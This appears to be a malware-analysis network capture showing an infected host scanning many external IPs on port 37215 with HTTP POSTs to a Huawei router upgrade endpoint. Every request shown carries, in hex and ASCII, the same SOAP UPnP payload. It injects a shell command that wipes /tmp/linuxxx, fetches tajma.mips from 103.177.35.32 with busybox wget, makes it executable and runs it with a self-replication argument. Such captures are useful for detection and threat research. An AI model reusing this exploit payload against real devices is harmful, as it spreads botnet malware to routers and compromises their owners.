                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1186192.168.2.2336168157.214.173.16037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530983925 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1187192.168.2.2358406157.236.10.2537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.530991077 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1188192.168.2.233451641.140.150.5537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.531413078 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1189192.168.2.234117687.18.94.9837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.531419992 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1190192.168.2.2355786157.90.134.4037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.531483889 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1191192.168.2.2345248197.219.244.23737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.531536102 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1192192.168.2.2339054202.95.95.5437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.531555891 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1193192.168.2.2342018197.238.127.5937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.531568050 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1194192.168.2.2335832157.36.66.18237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.532179117 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1195192.168.2.2360582209.66.202.19037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:08.532180071 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
